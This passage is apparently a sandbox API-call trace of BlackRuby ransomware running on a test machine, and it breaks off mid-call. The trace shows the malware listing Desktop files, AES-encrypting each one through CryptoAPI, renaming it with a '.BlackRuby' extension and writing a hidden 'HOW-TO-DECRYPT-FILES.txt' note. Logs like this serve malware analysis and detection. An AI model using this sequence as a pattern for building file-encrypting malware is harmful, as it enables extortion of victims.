[0055.454] GetLastError () returned 0x5 [0055.454] SetErrorMode (uMode=0x1) returned 0x0 [0055.454] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0055.454] GetLastError () returned 0x5 [0055.454] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.454] GetLastError () returned 0x5 [0055.454] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.454] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.455] GetLastError () returned 0x5 [0055.455] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.456] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.456] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.457] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.457] GetLastError () returned 0x5 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.458] GetLastError () returned 0x5 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.458] GetLastError () returned 0x5 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.458] GetLastError () returned 0x12 [0055.458] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0055.458] SetErrorMode (uMode=0x0) returned 0x1 [0055.458] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x0) returned 0x18 [0055.458] GetLastError () returned 0x12 [0055.458] SetErrorMode (uMode=0x1) returned 0x0 [0055.458] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360b60 [0055.458] GetLastError () returned 0x12 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.458] GetLastError () returned 0x12 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.458] GetLastError () returned 0x12 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.458] GetLastError () returned 0x12 [0055.458] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.459] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.459] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.460] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.460] GetLastError () returned 0x12 [0055.461] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.461] GetLastError () returned 0x12 [0055.461] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.461] GetLastError () returned 0x12 [0055.461] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.461] GetLastError () returned 0x12 [0055.461] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0055.461] GetLastError () returned 0x12 [0055.462] FindNextFileW (in: hFindFile=0x360b60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0055.462] GetLastError () returned 0x12 [0055.462] FindClose (in: hFindFile=0x360b60 | out: hFindFile=0x360b60) returned 1 [0055.462] SetErrorMode (uMode=0x0) returned 0x1 [0055.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.462] GetLastError () returned 0x12 [0055.462] SetErrorMode (uMode=0x1) returned 0x0 [0055.462] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), fInfoLevelId=0x0, lpFileInformation=0x1c42170 | out: lpFileInformation=0x1c42170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e20f6e0, ftCreationTime.dwHighDateTime=0x1d35a41, ftLastAccessTime.dwLowDateTime=0x4b98d400, ftLastAccessTime.dwHighDateTime=0x1d34ca8, ftLastWriteTime.dwLowDateTime=0x4b98d400, ftLastWriteTime.dwHighDateTime=0x1d34ca8, nFileSizeHigh=0x0, nFileSizeLow=0x3033)) returned 1 [0055.462] GetLastError () returned 0x12 [0055.462] SetErrorMode (uMode=0x0) returned 0x1 [0055.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.462] GetLastError () returned 0x12 [0055.462] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.462] GetLastError () returned 0x12 [0055.462] SetErrorMode (uMode=0x1) returned 0x0 [0055.462] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.462] GetLastError () returned 0x0 [0055.462] GetFileType (hFile=0x184) returned 0x1 [0055.462] SetErrorMode (uMode=0x0) returned 0x1 [0055.462] GetFileType (hFile=0x184) returned 0x1 [0055.462] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x3033 [0055.462] GetLastError () returned 0x0 [0055.462] ReadFile (in: hFile=0x184, lpBuffer=0x1c44020, nNumberOfBytesToRead=0x3033, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1c44020*, lpNumberOfBytesRead=0x18ed84*=0x3033, lpOverlapped=0x0) returned 1 [0055.463] GetLastError () returned 0x0 [0055.463] CloseHandle (hObject=0x184) returned 1 [0055.463] GetLastError () returned 0x0 [0055.463] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.463] GetLastError () returned 0x0 [0055.463] SetErrorMode (uMode=0x1) returned 0x0 [0055.463] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e20f6e0, ftCreationTime.dwHighDateTime=0x1d35a41, ftLastAccessTime.dwLowDateTime=0x4b98d400, ftLastAccessTime.dwHighDateTime=0x1d34ca8, ftLastWriteTime.dwLowDateTime=0x4b98d400, ftLastWriteTime.dwHighDateTime=0x1d34ca8, nFileSizeHigh=0x0, nFileSizeLow=0x3033)) returned 1 [0055.463] GetLastError () returned 0x0 [0055.463] SetErrorMode (uMode=0x0) returned 0x1 [0055.464] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c790) returned 1 [0055.464] GetLastError () returned 0x0 [0055.497] CryptImportKey (in: hProv=0x37c790, pbData=0x1ca4428, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360a20) returned 1 [0055.497] GetLastError () returned 0x0 [0055.497] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.497] GetLastError () returned 0x0 [0055.502] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.502] GetLastError () returned 0x0 [0055.502] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360c20) returned 1 [0055.502] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.502] GetLastError () returned 0x0 [0055.502] CryptSetKeyParam (hKey=0x360c20, dwParam=0x4, pbData=0x1cd1474*=0x1, dwFlags=0x0) returned 1 [0055.502] GetLastError () returned 0x0 [0055.502] CryptSetKeyParam (hKey=0x360c20, dwParam=0x1, pbData=0x1cd1440, dwFlags=0x0) returned 1 [0055.502] GetLastError () returned 0x0 [0055.502] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd14bc*, pdwDataLen=0x18ed74*=0x3130, dwBufLen=0x3130 | out: pbData=0x1cd14bc*, pdwDataLen=0x18ed74*=0x3130) returned 1 [0055.503] GetLastError () returned 0x0 [0055.503] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd7748*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cd7748*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.503] GetLastError () returned 0x0 [0055.503] CryptEncrypt (in: hKey=0x360c20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd7778*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cd7778*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.503] GetLastError () returned 0x0 [0055.503] CryptDestroyKey (hKey=0x360a20) returned 1 [0055.503] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.503] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0055.503] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.503] GetLastError () returned 0x0 [0055.503] SetErrorMode (uMode=0x1) returned 0x0 [0055.503] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.504] GetLastError () returned 0xb7 [0055.504] GetFileType (hFile=0x184) returned 0x1 [0055.504] SetErrorMode (uMode=0x0) returned 0x1 [0055.504] GetFileType (hFile=0x184) returned 0x1 [0055.505] CloseHandle (hObject=0x184) returned 1 [0055.505] GetLastError () returned 0xb7 [0055.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots", lpFilePart=0x0) returned 0x26 [0055.505] GetLastError () returned 0xb7 [0055.505] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_j5PMJIReVjyTA9tsSLSL0KJwqY5VWeV0BEvULFM6MyNZQ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_j5PMJIReVjyTA9tsSLSL0KJwqY5VWeV0BEvULFM6MyNZQ.BlackRuby", lpFilePart=0x0) returned 0x5a [0055.505] GetLastError () returned 0xb7 [0055.505] SetErrorMode (uMode=0x1) returned 0x0 [0055.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e20f6e0, ftCreationTime.dwHighDateTime=0x1d35a41, ftLastAccessTime.dwLowDateTime=0x4b98d400, ftLastAccessTime.dwHighDateTime=0x1d34ca8, ftLastWriteTime.dwLowDateTime=0x29462c40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x3140)) returned 1 [0055.505] GetLastError () returned 0xb7 [0055.505] SetErrorMode (uMode=0x0) returned 0x1 [0055.505] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\3HMq0syhj.ots" (normalized: "c:\\users\\eebsym5\\desktop\\3hmq0syhj.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Encrypted_j5PMJIReVjyTA9tsSLSL0KJwqY5VWeV0BEvULFM6MyNZQ.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\encrypted_j5pmjirevjyta9tsslsl0kjwqy5vwev0bevulfm6mynzq.blackruby")) returned 1 [0055.506] GetLastError () returned 0xb7 [0055.507] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.507] GetLastError () returned 0xb7 [0055.507] SetErrorMode (uMode=0x1) returned 0x0 [0055.507] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.507] GetLastError () returned 0x0 [0055.507] GetFileType (hFile=0x184) returned 0x1 [0055.507] SetErrorMode (uMode=0x0) returned 0x1 [0055.507] GetFileType (hFile=0x184) returned 0x1 [0055.508] CloseHandle (hObject=0x184) returned 1 [0055.509] GetLastError () returned 0x0 [0055.509] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x31 [0055.509] GetLastError () returned 0x0 [0055.509] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0055.509] GetLastError () returned 0x0 [0055.509] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.509] GetLastError () returned 0x0 [0055.509] SetErrorMode (uMode=0x1) returned 0x0 [0055.509] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), fInfoLevelId=0x0, lpFileInformation=0x1cfd89c | out: lpFileInformation=0x1cfd89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4ac540, ftCreationTime.dwHighDateTime=0x1d35451, ftLastAccessTime.dwLowDateTime=0x1e6bf540, ftLastAccessTime.dwHighDateTime=0x1d34db4, ftLastWriteTime.dwLowDateTime=0x1e6bf540, ftLastWriteTime.dwHighDateTime=0x1d34db4, nFileSizeHigh=0x0, nFileSizeLow=0x56dc)) returned 1 [0055.509] GetLastError () returned 0x0 [0055.509] SetErrorMode (uMode=0x0) returned 0x1 [0055.510] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.510] GetLastError () returned 0x0 [0055.510] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.510] GetLastError () returned 0x0 [0055.510] SetErrorMode (uMode=0x1) returned 0x0 [0055.510] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0055.510] GetLastError () returned 0x0 [0055.510] GetFileType (hFile=0x184) returned 0x1 [0055.510] SetErrorMode (uMode=0x0) returned 0x1 [0055.510] GetFileType (hFile=0x184) returned 0x1 [0055.510] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x56dc [0055.510] GetLastError () returned 0x0 [0055.510] ReadFile (in: hFile=0x184, lpBuffer=0x1cff4d4, nNumberOfBytesToRead=0x56dc, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1cff4d4*, lpNumberOfBytesRead=0x18ed84*=0x56dc, lpOverlapped=0x0) returned 1 [0055.511] GetLastError () returned 0x0 [0055.511] CloseHandle (hObject=0x184) returned 1 [0055.511] GetLastError () returned 0x0 [0055.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.511] GetLastError () returned 0x0 [0055.511] SetErrorMode (uMode=0x1) returned 0x0 [0055.511] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\3mfjcuz8e.rtf"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4ac540, ftCreationTime.dwHighDateTime=0x1d35451, ftLastAccessTime.dwLowDateTime=0x1e6bf540, ftLastAccessTime.dwHighDateTime=0x1d34db4, ftLastWriteTime.dwLowDateTime=0x1e6bf540, ftLastWriteTime.dwHighDateTime=0x1d34db4, nFileSizeHigh=0x0, nFileSizeLow=0x56dc)) returned 1 [0055.511] GetLastError () returned 0x0 [0055.511] SetErrorMode (uMode=0x0) returned 0x1 [0055.551] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1b6a114, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360fa0) returned 1 [0055.551] GetLastError () returned 0x0 [0055.551] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.551] GetLastError () returned 0x0 [0055.557] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360d20) returned 1 [0055.557] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1b97160*=0x1, dwFlags=0x0) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1b9712c, dwFlags=0x0) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b971a8*, pdwDataLen=0x18ed74*=0x57d0, dwBufLen=0x57d0 | out: pbData=0x1b971a8*, pdwDataLen=0x18ed74*=0x57d0) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba2174*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1ba2174*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0055.557] GetLastError () returned 0x0 [0055.557] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ba21a4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1ba21a4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0055.558] GetLastError () returned 0x0 [0055.558] CryptDestroyKey (hKey=0x360fa0) returned 1 [0055.558] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.558] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0055.558] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\3mFJCUz8E.rtf", lpFilePart=0x0) returned 0x26 [0055.558] GetLastError () returned 0x0 [0055.558] SetErrorMode (uMode=0x1) returned 0x0 [0055.558] CreateFileW 